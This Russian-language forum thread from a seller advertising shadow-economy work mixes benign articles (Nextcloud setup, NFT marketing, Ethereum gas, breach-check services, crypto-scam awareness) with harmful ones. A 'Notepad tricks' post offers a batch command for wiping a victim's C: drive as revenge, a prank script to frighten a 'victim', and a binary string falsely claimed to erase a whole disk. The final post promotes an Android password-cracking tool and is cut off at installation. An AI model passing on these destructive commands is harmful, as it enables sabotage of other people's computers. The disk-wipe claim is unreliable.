The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project The YapLink Project

Статья NEW Авторские статьи / схемы заработка от BlackMast





Приветствуем всех читателей и участников форума!
В этой теме мы будем публиковать наши авторские статьи.
Наша команда писателей тщательно выбирает интересные темы и пишет оригинальный контент специально для вас!

Каждую неделю мы будем делиться с вами новым контентом, связанный с дарком!

💢 Еще больше контента можно найти на нашем канале в Телеграме!
https://t.me/+_nx0mbcIGWlhMTFi

➖ Авторские статьи по заработку, мануалы и скрипты по безопасности

➖ Абсолютно каждый день свежие новости про крипту, теневые темы, криминал и NFT

☑️ Так же у нас есть чат, где можно найти работу в теневой сфере или подыскать покупателей на свои услуги!​
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0



Вступить в наш чат
Nextcloud - это альтернатива Dropbox, Google Drive, Onedrive со своими значительными преимуществами. Это программное обеспечение с открытым исходным кодом, которое позволяет хранить личные данные, не переживая за их безопасность, так как информация хранится на подконтрольном сервере. Самой интересной фишкой данного хранилища является то, что оно может выступать не только в роли файлового хостинга, но и закрытого сообщества, где вы можете общаться с помощью аудио и видео звонков, переписываться или вовсе превратить хранилище в рабочее пространство. Доступ к Nextcloud возможен с любых устройств, например, с телефона или компьютера.



Сегодня мы научимся настраивать облачное хранилище менее чем за пол часа.


Скачать Nextcloud


Устанавливаем Next Cloud
В качестве серверной системы мы будем использовать Ubuntu 20.04.​
Настройка будет осуществляться с помощью системы пакетов Snap. Она по умолчанию доступна в Ubuntu 20.04. Это означает, что процесс установки будет максимально простым., так как вместо установки и настройки веб-сервера и сервера базы данных и настройки приложения Nextcloud для работы с ними мы можем установить пакет snap, который автоматически настроит все системы.
Чтобы загрузить пакет Nextcloud snap и установить его в системе, введите:​
sudo snap install nextcloud Пакет Nextcloud будет загружен и установлен на ваш сервер. Вы можете проверить успешность установки посредством вывода изменений, связанных с пакетом snap:
snap changes nextcloud

Output ID Status Spawn Ready Summary 4 Done today at 16:12 UTC today at 16:12 UTC Install "nextcloud" snap Информация о состоянии и сводная информация показывают, что установка была выполнена без проблем.



Дополнительная информации о Nextcloud Snap
Если вам нужна дополнительная информация о Nextcloud snap, вам могут помочь несколько полезных команд.
Команда snap info показывает описание, доступные команды управления Nextcloud, установленную версию и отслеживаемый канал snap:
snap info nextcloud Посмотреть сетевые интерфейсы пакета:
snap interfaces nextcloud Результат:
Output Slot Plug :network nextcloud :network-bind nextcloud - nextcloud:removable-media Посмотреть список служб пакета:
cat /snap/nextcloud/current/meta/snap.yaml


Настраиваем учетную запись Nextcloud
Создание учетной записи Администратора:
sudo nextcloud.manual-install имя пароль Вместо «имя» вводим имя администратора учетной записи и вместо слова «пароль» вводим непосредственно придуманный пароль для учетной записи.
Следующее сообщение указывает, что настройка Nextcloud выполнена правильно:
Output Nextcloud was successfully installed После установки Nextcloud нам необходимо настроить доверенные домены, чтобы Nextcloud реагировал на запросы с использованием доменного имени или IP-адреса сервера.​


Настраиваем доверенные домены

Первый способ:


Для доступа к Nextcloud мы будем использовать доменное имя сервера или IP-адрес, и поэтому нам нужно изменить эту настройку, чтобы можно было применять запросы этого типа.
Вы можете просмотреть текущие настройки, запросив значение массива trusted_domains:
sudo nextcloud.occ config:system:get trusted_domains

Output localhost В настоящее время в массиве содержится только первое значение localhost. Мы можем добавить запись для доменного имени или IP-адреса нашего сервера, введя следующее:
sudo nextcloud.occ config:system:set trusted_domains 1 --value=example.com

Output System config value trusted_domains => 1 set to string example.com Если мы снова запросим значение trusted domains, мы увидим уже две записи:
sudo nextcloud.occ config:system:get trusted_domains

Output localhost example.com

Второй способ:


Если у вашего сервера Nextcloud нет доменного имени, вы можете защитить веб-интерфейс, создав сертификат SSL с собственной подписью. Этот сертификат обеспечит доступ к веб-интерфейсу через шифрованное соединение, но не сможет подтверждать подлинность вашего сервера, и поэтому ваш браузер может вывести предупреждение при попытке открыть сервер.
Чтобы сгенерировать сертификат с собственной подписью и настроить Nextcloud для его использования, введите:
sudo nextcloud.enable-https self-signed

Output Generating key and self-signed certificate... done Restarting apache... done Показанный выше результат означает, что Nextcloud сгенерировал и активировал сертификат с собственной подписью.
Теперь, когда вы защитили интерфейс, откройте веб-порты брандмауэра, чтобы разрешить доступ к веб-интерфейсу:
sudo ufw allow 80,443/tcp

Настройка успешно завершена.


Входим в Nextcloud

Поскольку вы уже настроили учетную запись администратора из командной строки, вы перейдете на страницу входа Nextcloud. Введите учетные данные, которые вы создали для администратора:




Нажмите кнопку "Войти" для входа в Nextcloud.
При первом входе откроется окно с приветственным текстом и ссылками на различные клиенты Nextcloud:




Загрузите любые клиенты, которые вам интересны. Далее вы перейдете в главный интерфейс Nextcloud, где сможете выгружать файлы и управлять ими:



Дополнительные настройки NextCloud

В NextCloud доступно огромное количество приложений для расширения функциональности:

  • Auto Groups – автоматическое добавление пользователей в группы;​
  • Checksum – вычисление хеш-сумм файлов (md5, sha1, sha256, sha384, sha512 и crc32);​
  • Music – удобный аудио плеер;​
  • News – приложение для чтения новостей с помощью формата RSS/Atom;​
  • ONLYOFFICE – офисное приложение для создания и редактирования документов. Созданные документы автоматически сохраняются в облаке;​
  • Registration – добавление опции регистрации на главной странице;​
  • Social login – регистрация с помощью соц. сетей;​
  • Social – чат;​
  • Talk – видео и аудио звонки, создание комнат для обсуждения. Для мобильных устройств доступно отдельное приложение.​
В следующей статье мы более подробно рассмотрим начало работы в Nextcloud, полезные фишки и различные настройки.​
Заключение

Nextcloud - это многофункциональное программное обеспечение, которое является не только облачным хранилищем, но и целой сетью, где можно общаться, слушать музыку, работать и совершать конференции. И самое главное, что все данные хранятся в защищенном месте, которое вы сами и контролируете.



 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0



Вступить в наш чат

Nextcloud - это не просто облачное хранилище, а это целое сообщество, где можно чатиться, совершать аудио и видео звонки, и при этом оставаться анонимным.

В прошлой статье мы научились настраивать Nextcloud, а сегодня поговорим об основных функциях,
о которых вам следует знать.
Начало работы

После установки Nextcloud выглядит как обычное файловое хранилище.
Но это легко поправимо, мы покажем как установить на него дополнительные приложения, чтобы повысить его функциональность. В правом верхнем углу нажимаем на иконку пользователя и выбираем "Приложения"

В разделе «Пакеты приложений»находится огромный список программ. Узнать подробнее о каждой программе можно, нажав на ее заголовок. Нам же более интересен «Основной набор приложений» : вы можете можно включить как все приложения, так и отдельные. Затем введем пароль администратора, и установка начнется. По ее завершению иконки приложений вы найдете в верхней панели.


Как добавить учетные записи

Для того, чтобы использовать Nextcloud совместно с другими пользователями, вам нужно добавить их учетные записи. Сделать это можно, выбрав в правом верхнем углу иконку администратора -> «Пользователи»:





Для удобства можно создать дополнительные группы, чтобы установить уровень доступа. По умолчанию есть группа «Администраторы» с полным доступом к приложению, но вы можете создать, например, группу «Сотрудники» и добавлять туда учетные записи с лимитированным доступом, например, тех, кому пользоваться приложениями можно, а менять настройки Nextcloud уже нельзя:
Придумываем логин, указываем отображаемое имя, пароль, почтовый ящик, присваиваем группу и устанавливаем ограничение дискового пространства для каждого пользователя.


Как настроить дополнительные инструменты

После того как добавили пользователей, переходим к настройке дополнительных функций.

Календарь

Календарь может понадобится для работы: указать конкретные задачи, обозначить сроки и т.д. Попасть в раздел календаря вы можете в верхнем меню приложений:





Импорт готового календаря

Допустим, у вас уже есть готовый календарь со всеми событиями и задачами, и вы только хотите загрузить его в Nextcloud. Для этого экспортируйте его в файл .ics и загрузите в наше приложение в разделе Параметры и импорт -> Import Calendar.





Создание нового календаря

Если готового календаря у вас нет, то давайте создадим новый таким способом:





  • 1. Кликните на кнопку + Создать календарь в левой части экрана.
  • 2. Запишите название, например, Работа.
  • 3. Нажмите на «галочку» - календарь будет создан, а все события будут доступны с любых устройств для всех пользователей, которых подключите к нему.
Подключить пользователей к календарю можно вручную, добавляя каждого отдельно или всю группу, например, «Сотрудники». Но вы также можете предоставить доступ к календарю с помощью ссылки -> "Поделиться ссылкой". После того, как пользователи перейдут по ссылке, они сами автоматически добавятся к календарю.



Задачи

Стоит отметить, что календарь и сам неплохо справляется с этой функцией, но если вам нужно более четкое структурирование задач и отслеживание их выполнения, вы можете воспользоваться инструментом Deck.



На скрине выделена кнопка +Создать рабочую доску, а еще "Поделиться»" и "Параметры" для уже готовых досок.
Если вы "Поделитесь" ссылкой, то автоматически разрешите доступ конкретному человеку или группе пользователей.




На странице "Параметры" вы можете вносить любые изменения: переименовать доску, удалить ее или добавить в архив. В созданной доске каждый желающий пользователь с доступом может вносить изменения в задания. Сначала создаются списки с категориями заданий, в каждый список можно добавлять карточки со списками конкретных задач.
Далее составляются списки заданий, в каждом из них можно добавлять карточки с определенными заданиями. С помощью меток статуса можно определить статус задания и его выполнение. Также к каждой задаче можно прикреплять сотрудника, устанавливать срок выполнения, загружать дополнительные файлы и приложения.
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0



Вступить в наш чат

NFT-токен - это уникальный, подлинный цифровой актив, который нельзя заменить на любой другой. Поскольку спрос на невзаимозаменяемые токены стремительно растет, вы можете не только инвестировать в NFT, но и попробовать создать свои собственные. Если вы это уже сделали, то наверняка столкнулись со следующей проблемой: "Как их продвигать?". Заручиться поддержкой аудитории и повысить свою узнаваемость - дело не из легких. Однако, существуют способы, которые помогут вам это сделать. О них мы и поговорим в этой статье.





рост популярности NFT


Для начала вспомним, в виде чего мы можем создавать NFT:

  • Фото/видео
  • Арт
  • Музыка
  • Gif
  • Предметы в играх
  • Твиты
Чтобы приобрести любой NFT достаточно зарегистрироваться на любой площадке вроде Binance и создать счет. Далее смотрим доступные к покупке токены и жмем "Купить". Готово.





Если с покупкой все более менее понятно, то как быть с продажей?


Платформа

В первую очередь следует выбрать и зарегистрироваться на платформе. У каждой из них есть свои отличия и особенности, поэтому окончательное решение остается за вами. Главное, на что необходимо обратить внимание - это наличие Ethereum.


Кошелек

Затем нужно открыть свой Ethereum кошелек. Лучшими NFT-кошельками единогласно признают:

  • Metamask
  • AlphaWallet
  • Trust Wallet
  • Coinbase Wallet
  • Enjin
А теперь самое главное - продвижение:


Создайте блог про NFT


Главное, что вы должны знать про продвижение NFT, так это то, что оно напрямую взаимосвязано с продвижением вашего блога, т.е. вы должны продвинуться в соц. сетях перед тем, как начать продавать NFT. "Впаривать" аудитории свои токены не нужно, поначалу вы должны в стать проводником для них в мир невзаимозаменяемых токенов, так как до сих пор многие люди не имеют ни малейшего понятия, что это такое.
Запомните, что клиент никогда не купит то, о чем он не знает, поэтому взгляните на это с другой стороны, вспомните, когда вы первый раз узнали про NFT, что вам было интересно. Расскажите им, что такое NFT, метавселенная, про отличие от другой криптовалюты, самые дорогие токены, зачем нужно инвестировать в NFT и как их можно купить и продать. Чем больше образовательного контента на первых порах, тем лучше же для вас.
Где вести свой блог? Не стоит заводить аккаунты во всех социальных сетях, так как это слишком энергозатратно, достаточно сосредоточиться на 4 основных платформах, там вы сможете найти свою целевую аудиторию:

  • Instagram
  • Twitter
  • BitCoinTalk
  • Telegram
Расположив к себе подписчиков и став для них неким экспертом в области NFT, вы сможете быстрее продать свои токены в дальнейшем.


Покупайте рекламу

Иногда единожды удачно купленная реклама стоит года тщетных попыток продвинуть аккаунт. Не думайте, что, создав блог, к вам полетят тысячи подписчиков. К сожалению, так бывает, но очень редко, чаще всего продвижение стоит денег.
Но для того, чтобы не спустить эти деньги на ветер, найдите подходящего инфлюенсера, который в своем аккаунте расскажет про ваш замечательный блог. Важно, чтобы тематика ваших аккаунтов совпадала (он рассказывает про биткоины, а вы про NFT), в противном случае после такого продвижения подписчиков не прибавится. Если не хотите заморачиваться с поиском инфлюенсера, то настройтесь таргетинговую рекламу в Instagram. Ключевым словом является "таргетинговая", т.е. реклама для тех людей, которые были бы заинтересованы в покупке NFT в данный момент. Это легко делается с помощью инструментов в инстаграме.


SEO

Повысьте свою узнаваемость с помощью SEO (приемы, которые помогают поднять вас в топ рейтинга поисковых систем). Как вы собираетесь продавать NFT, если ваше имя не отображается в результатах поиска? Данный шаг очень важен, если вы хотите, чтобы клиенты вас могли найти самостоятельно.
Если вы не дружите с поисковой оптимизацией, то не раздумывая, обратитесь к SEO-специалистам.


Самопиар

Как только вы наберете N-количество подписчиков, время действовать. Расскажите клиентам про тему ваших NFT, что вы создали, какие проекты вы готовите. Делайте акцент на контент-маркетинге, так это поможет деликатно ознакомиться потенциальных покупателей с вашими токенами. Сделать самопиар ненавязчивым можнос помощью нескольких уловок:

  • Краткость - сестра таланта. Не пишите длинные статьи, их никто не будет читать, ваша задача - передать суть несколькими предложениями. А еще пытайтесь выражать мысли простым языком без использования заумных фраз и прочих сложностей;
  • Используйте слова- триггеры (с призывами). Что-то вроде "Получите бесплатный NFT", "Только сегодня скидка 50 %". Это действительно работает.
  • Срочность. Внушите подписчикам, что ваше предложение ограничено, сказав, что скидка действует только сегодня или предложение истекает через час. Этот способ будет работать в том случае, если вы не будете злоупотреблять им.
  • Красивый визуал. Это особенно актуально для инстаграма. Позаботьтесь о ярких картинках, инфографике и коротких роликах, тогда ваш пост не останется без внимания.
И, конечно же, не забывайте про дружеский настрой, будьте с подписчиками на одной волне, спрашивайте, что им было бы интересно, отвечайте на их вопросы.


NFT-маркетплейсы

Чтобы продать NFT, вы должны разместить их на нескольких маркетплейсах как на платформах, специализирующихся исключительно на NFT, та и на универсальных площадках. Чем чаще покупатели будут видеть ваши NFT, тем выше шанс, что их купят.
Список самых популярных NFT-маркетплейсов:

  • Foundation - для диджитал-арта;
  • MakersPlace - для компьютерной графики;
  • SuperRare - для цифровых произведений искусства;
  • OpenSea - для предметов искусства, фото, музыки, спортивных карточек и коллекционных гифок;
  • Rarible - для коллекционных крипто-предметов;
  • Enjin — для активов блокчейна;
  • KnownOrigin - для редких коллекционных предметов искусства;
  • MythMarket - для коллекционных карточек.
Прокачайте PR

Распространяйте информацию о своих NFT по крупным информационным площадкам, СМИ. Если нет конкретной договоренности с изданием, напишите пресс-релиз, расскажите о своих токенах и разошлите журналистам. Не ждите, что к вам постучаться в дверь с просьбой взять у вас интервью - будьте тем кто сам стучиться во все двери, стараясь ухватиться за любую возможность.


Оптимизируйте коэффициент конверсии - CRO

Все ранее перечисленное должно давать положительный эффект на конверсию, иначе ни в контент-маркетинге, ни в PPC-рекламе смысла нет. Поэтому постоянно контролируйте показатели конверсии и меняйте стратегию продвижения, если они падают, а не повышаются.
Чтобы повысить доверие к вам - публикуйте отзывы клиентов, продумывайте подачу контента (о чем конкретно писать, на каких площадках размещать, в какие дни публиковать). Таким образом, вы должны продумать каждую деталь, чтобы ваше дело принесло плоды.


Итог

Пока другие только узнают о существовании NFT, будьте теми, кто поможет им разобраться во всех тонкостях невзаимозаменяемых токенов. Не бойтесь неудач, грамотно выстраивайте свой бизнес план, дабы их избежать. Удачи!
Интересно узнать, как заключенный смог стать успешным NFT- художником, заработав миллион? - Читайте здесь.
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0



Вступить в наш чат
Впервые слышите такое понятие как "газ", хотя уже знакомы с криптовалютой и сетью Ethereum? Тогда эта статья для вас, мы разберемся вместе с вами, что такое GAS и зачем его платят в сети эфира.



Что такое газ

Простыми словами, газ или GAS - это плата, которая происходит каждый раз, когда вы совершаете операции в сети эфира. Если в сети Bitcoin - комиссия, то в сети Ethereum - это газ.
Таким образом, цена на газ эфира - это обычная комиссия за покупку, добавление своего NFT, вывод денег и практически любое действие, связанное с криптовалютой. Дело в том, что комиссия, она же цена на газ, меняется ежеминутно. Почему это происходит?
Когда пользователи впервые слышат про это, у них появляется еще больше вопросов. К примеру, с Bitcoin все ясно: сеть нужна для переводов крипты, где вы сами устанавливаете комиссию - чем выше комиссия, тем быстрее поступит перевод.
Когда дело заходит про Ethereum, то стоит понимать, что главная задача сети - это поддержка выполнений смарт-контрактов. Это специальная программа для проверок переводов. Помимо это сеть эфира нужна для:

  • Переводов Эфириума другому пользователю;
  • Формирования смарт-контрактов (программ) и записи их в блокчейн;
  • Обеспечения работы этих смарт-контрактов (программ) .
Стоимость газа

Когда вы пользуетесь блокчейном, вы, сами того не осозновая, используете мощности компьютеров других пользователей, которые как раз и берут за это комиссию или плату за газ.
Плата за газ может изменяться, смотря на загруженность блокчейна и сложность задачи. Если помимо вас совершает транзакцию большое количество других пользователей, то цена на газ растет, так как в блокчейне эфира есть лимит на транзакции - 30 за 1 секунду. Так что, пользователи, которые не хотят ждать большой очереди, платят повышенную комиссию. Повышенный спрос на операции прямо пропорционален цене газа.
Также отмечают, что рост цены на газ может зависеть от тарифов на коммунальные услуги. Держатели компьютеров, чьими услугами вы пользуетесь, вынуждены обслуживать их, а точнее платить счета за обычное электричество.




Как не платить большую комиссию

От цены за газ и лимита газа зависит скорость выполнения транзакции и, если вы поставите очень низкий процент, то время ожидания выполнения операции может увеличиться от нескольких часов до пары дней.
Для того, чтобы не переплачивать за каждую операцию, следует поставить ограничения на цену за газ и на лимит газа.
Лимит газа служит определенным ограничителем платы за перевод. Допустим, вы выставите лимит 1.000.000 газ, а смарт-контракту нужно лишь 50.000 газ, то вы и заплатите только 50.000. Лимит сделан для того, чтобы пользователь не переплатил в таком случае.
Вы сами устанавливаете цену в зависимости от того как быстро вы хотите, чтобы операция прошла. Есть хороший сервис ETH Gas Station, который служит калькулятором, позволяющим подобрать оптимальное значение цены за газ.





Вывод

Газ делает обмен между пользователями максимально честным. Хотя вы ежедневно пользуетесь многими сервисами, не платя никакой комиссии, это не делает ваше взаимодействие прозрачным. Вместо платы, вы позволяете собирать о себе данные, показывать вам персонализированную рекламу, а значит - зарабатывать на ваших действиях. Тем не менее, вы можете не переплачивать за газ. Если вы продаете NFT, то выкладывайте свои токены на маркетплейсах, где не требуется оплата за транзакцию. Ну, а если вы инвестируете, то используйте калькулятор газа, чтобы подобрать подходящую комиссию.

 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0



Вступить в наш чат
Никогда нельзя недооценивать анонимность, ваша безопасность с легкостью может быть подорвана в любой момент. Ежесекундно утекает информация и данные с ваших устройств, а вы ничего не можете с этим поделать. Или можете? В этой статье вы узнаете, как определить, что произошла утечка данных, и что с этим делать.



За последние годы многие пользователи смирились с тем, что с их телефонов и компьютеров отправляется большое количество данных в различные сервисы, которые он использует. Такой сбор данных выгоден компаниям для совершенствования своего продукта и создания персонализированной рекламы.
Если это не так сильно беспокоит вас, то следует знать, что помимо компаний, собирающих информацию, ваши данные могут быть украдены и слиты злоумышленниками. И это уже повод начать бить тревогу.

А вы уверены, что вы не стали одной из многих жертв хакеров, чьи пароли стали всеобщим достоянием? Давайте это проверим.
Сервисы для проверки паролей на предмет утечки:


1. Have I been pwned?



Самый популярный сайт для проверки возможных утечек. Have I been pwned - это та же поисковая система, только с реверсивным поиском для проверки вашей почты и паролей в бесчисленной базе данных. Для того, чтобы выяснить попали ли ваши данные в руки злоумышленников, введите email, пароль и система выдаст эту информацию. Данный сервис был создан после одной из самых провокационных утечек, а именно, когда в 2013 году в сеть попали данные свыше 153 миллионов пользователей Adobe.


2. DeHashed




Сервис DeHashed создавался не только для простых пользователей, но и для компаний, журналистов, экспертов по безопасности и для всех, кто хочет сразу же узнавать о сливах данных. DeHashed осуществляет поиск по базам украденных персональных данных. С его помощью можно делать запрос по IP-адресам, логинам, паролям, телефонным номером, email адресам и др.


3. Sucuri Security Scanner



Sucuri Security Scanner отличается от двух предыдущих сервисов, так как он ищет не только слитые логины и пароли, но и проверяет целые сайты на возможные хакерские атаки и утечки данных.


4. LeakCheck




С помощью поиска на сайте LeakCheck вы можете узнать, был ли украден ваш пароль от email. Введите почтовый адрес, если произошла утечка, то сервис покажет пароли, которые находятся во всеобщем доступе.


5. SpyCloud




SpyCloud имеет огромную базу данных, в которой также может оказаться ваш пароль или другие данные.


6. Firefox Monitor




Сервис Firefox Monitor разработан компанией Mozilla и представляет собой поиск по базе данных слитых паролей. Помимо этого, вы можете пройти регистрацию, чтобы первым быть в курсе возможных утечек.


7. GhostProject




И закрывает наш топ сервис GhostProject, который может похвастаться многочисленной базой в 1.5 млн слитых данных. Но это еще не все, так как база регулярно пополняется новыми утекшими данными.

Итог

Стоит с осторожностью и внимательностью относится к защите своих данных, ведь информация постоянно копируется, перехватывается и сливается без вашего ведома. О том, как действовать, если вы обнаружили себя в базе утекших данных, и что делать, чтобы этого не повторилось, мы расскажем в следующей части.
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
Отгадайте загадку: «Её легко украсть и почти невозможно вернуть». Совершенно верно, речь идет о криптовалюте. Мошенники всегда находятся в поисках новых схем кражи денег пользователей. А наблюдаемый в последние годы массовый рост использования криптовалюты дает большое количество возможностей для хакеров. В этой статье мы решили рассказать про различные виды угроз, с которыми может столкнуться каждый человек, а также способы противостоять злоумышленникам.

1. Фишинг​

Этот метод состоит в том, что мошенник регистрирует домен, который на первый взгляд нельзя отличить от биткоин кошелька, но разница заключается в нескольких символах в URL-адресе. После чего он создает аналогичный сайт, который завлекает пользователей своей рекламой.
Возьмем в качестве примера известный кошелек blockchain.com. Мы набрали название в Google, и первыми выскочили несколько подозрительных ресурсов:

Открываем один из них, и мы отказываемся на фишинговом сайте, который внешне практически не отличим от официального, за исключением трех букв в домене: вместо «blockchain.com» получилось «blockrcnain.com»:
Если ввести свой ID и пароль на таком сайте, то злоумышленники смогут без проблем вывести все ваши средства. Чтобы не попасться в ловушку, достаточно добавить официальный сайт в закладки.

2. Мобильные приложения​

Злоумышленники также могут орудовать в Google Play и других мобильных магазинах приложений. Суть этого развода проста: создается приложение и загружается в Гугл Маркет, где любой желающий может найти его с помощью поиска. После установки и ввода своих данные для входа, вся информация утекает прямо к злоумышленнику. Ниже приведены примеры таких приложений:
А вот один из отзывов жертвы:


Чтобы не быть обманутым, нужно искать не в поиске приложений, а на официальных сайтах. В том же Блокчейне всего 2 ссылки, одна на Google Play, а другая в App Store. Рейтинг 5 звезд и много положительных отзывов не являются показателем надежности и безопасности.

3. Взлом с помощью QR-кода

В каждом криптокошельке есть QR-код, и выглядит он так:
Если злоумышленник просканирует его, то легко сможет вывести средства с вашего кошелька. На просторах интернета много способов, как его можно заполучить, поэтому никогда и ни при каких случаях не показывайте его.

4. Браузерные расширения

Кроме того, злоумышленники могут создать расширение с тем же интерфейсом, что и у популярных криптовалютных кошельков Trezor, Metamask или Ledger. Основная цель — заставить жертву рассекретить свою сид-фразу. Используя эту фразу, вы можете восстановить доступ к своему кошельку и вывести криптовалюту. Например, если зайти в Chrome Web Store и ввести в поиске "Metamask", то мы увидим 3 кошелька, 1 из которых настоящий, а 2 от неизвестных авторов, которые мы однозначно не советуем устанавливать:


Хотя мошеннические расширения регулярно удаляются, неизбежно появляются новые:

5. Clipрer

Clipper — это программа, которая заменяет адреса кошельков в буфере обмена. Когда пользователь копирует адрес своего криптокошелька в буфер обмена, программа заменяет его адресом, принадлежащим злоумышленнику. Таким образом, когда жертва отправляет свои средства, она на самом деле отправляет их на кошелек, принадлежащий злоумышленникам.

Чтобы этого не произошло, никогда не переходите по неизвестным ссылкам, а также всегда проверяйте первую и последнюю цифры кошелька перед отправкой криптовалюты.

6. Замена SIM-карты

Уже ни раз приходилось слышать в новостях о случаях кражи средств путем замены SIM-карты. Хакеры звонят в службу поддержки мобильного оператора с просьбой восстановить номер телефона жертвы. Затем они получают доступ к учетной записи Google и могут вывести все средства:
Чтобы не потерять криптовалюту таким способом, купите отдельную SIM-карту для всех важных кошельков и никому не давайте номер телефона.

7. Скам биржи

Существуют проверенные биржи, которые славятся надёжной репутацией уже многие годы, но бывают и скамерские проекты, которые, проработав некоторое время, в один прекрасный момент исчезают с радаров вместе с вашими деньгами.
Чтобы не стать жертвой очередного скам проекта, следует торговать только на крупных площадках, которые работают не первый год. Помимо этого, не нужно хранить деньги на биржах, вместо этого отлично подойдут аппаратные кошельки.

Заключение

Итак, вы ознакомились лишь с малой частью способов кражи криптовалюты, но на самом деле их существует бесчисленное множество! Стоит проявлять предельную бдительность и осторожность, следуя всем вышеуказанным советам, а именно внимательно проверять домены, кошельки, приложения и т.д. Ведь, если злоумышленник заполучит доступ к вашему криптокошельку, у вас почти не будет шансов вернуть украденные средства, поскольку все транзакции анонимны.
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0

Трюки с Блокнотом, которые вас удивят​


Программу Блокнот очень сильно недооценивают. Признайтесь, как часто вы пользуетесь ей? Готовы поспорить, что все ваши действия в этой программе заканчиваются на наборе случайного текста с периодичностью раз в год. А знаете ли вы, какие-либо лайфхаки с использованием Блокнота? Сегодня мы приготовили несколько необычных трюков. И все, что вам потребуется, это БЛОКНОТ!

1. Дневник/журнал

Хотите вести цифровой дневник без использования каких-либо сторонних приложений и программ? Как вы уже могли догадаться, вам понадобиться лишь Блокнот.
Шаг 1: Откройте Блокнот из меню «Пуск» или командной строки.
Шаг 2: Введите «.LOG» в первой строке.
Шаг 3: Сохраните файл как name.txt.
Теперь, когда вы открываете файл, он будет отображать дату и время, чтобы вы могли написать все, что захотите.


2. Заставьте клавиатуру мигать, как диско шар

Этот трюк заставит мигать клавиатуру, что наверняка напугает жертву, заставив думать, что ее взломали или что-то в этом роде. Скопируйте и вставьте код в Блокнот и сохраните его как «disco.vbs».
Код:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop


3. Проверьте, как хорошо работает ваш антивирус

Многие антивирусные программы могут быть эффективными и молниеносно находить вирусы, а другие нет. У вас есть возможность узнать, к какой категории относится ваш антивирус с помощью этого простого трюка. Скопируйте и вставьте приведенный ниже код в свой блокнот и сохраните его как «virus.exe» (не волнуйтесь, это не является никаким вирусом на самом деле). Затем как обычно выполните проверку на наличие вирусов.
Если этот файл обнаружится, значит, ваш антивирус исправен. В противном случае нужно начинать искать другие варианты. Это один из самых полезных лайфхаков в Блокноте.
Код:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


4. Защитите файл паролем

Наверняка, на вашем компьютере есть файлы, которые вы хотите сохранить в тайне. И вы, вероятно, используете стороннее приложение для этого. Но что, если мы скажем, что вам оно не нужно? Этот лайфхак поможет защитить файл от любопытных глаз паролем. Да, никакого стороннего софта, только несколько строк кода. Звучит круто, правда?
Скопируйте и вставьте код, написанный ниже, и сохраните файл с расширением «.bat».
Код:

title Folder Private
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock the folder
set/p “pass=>”
if NOT %pass%== techmaniya.com goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End


5. Удалите содержимое диска C:

Хотите жестко отомстить в хакерском стиле? Этот трюк для вас. Скопируйте и вставьте приведенный ниже код, и сохраните под любым названием, но с расширением «.bat». Когда этот файл откроется на любом ПК, он сотрет весь диск C:.
Код:

@Echo off
Del C:\ *.* |y


6. Очистите весь жесткий диск

Если Блокнот может стереть весь диск C:, сможет ли он стереть весь жесткий диск? Ответ: Да. Ниже написан код для этой цели. Обязательно присвойте файлу расширение «.exe» после копирования кода в «Блокнот». Как только файл будет открыт, весь жесткий диск сотрется.
Код:

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000




 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
Лучшее приложение для взлома паролей на Android



Вступить в наш чат

Хотите взломать пароль, но у вас нет навыков работы с Kali Linux или вовсе нет компьютера — не беспокойтесь, теперь вы можете хакнуть пароли с помощью одного лишь телефона. А поможет нам в этом Hash Suite Droid — инструмент для взлома паролей на Android. Сегодня мы вам расскажем, что он из себя представляет, и как им пользоваться.




Что такое Hash Suite Droid

Hash Suite Droid — это Android-версия известного набора инструментов для взлома паролей. Проще говоря, это инструмент, который взламывает хэши паролей с помощью вашего устройства Android. А главный его плюс заключается в том, что он не требует root-доступа и абсолютно бесплатен.

Итак, сейчас мы на практике покажем вам, как пользоваться этим инструментом.

Установка

Шаг 1: Загрузите и установите apk-пакет инструмента.

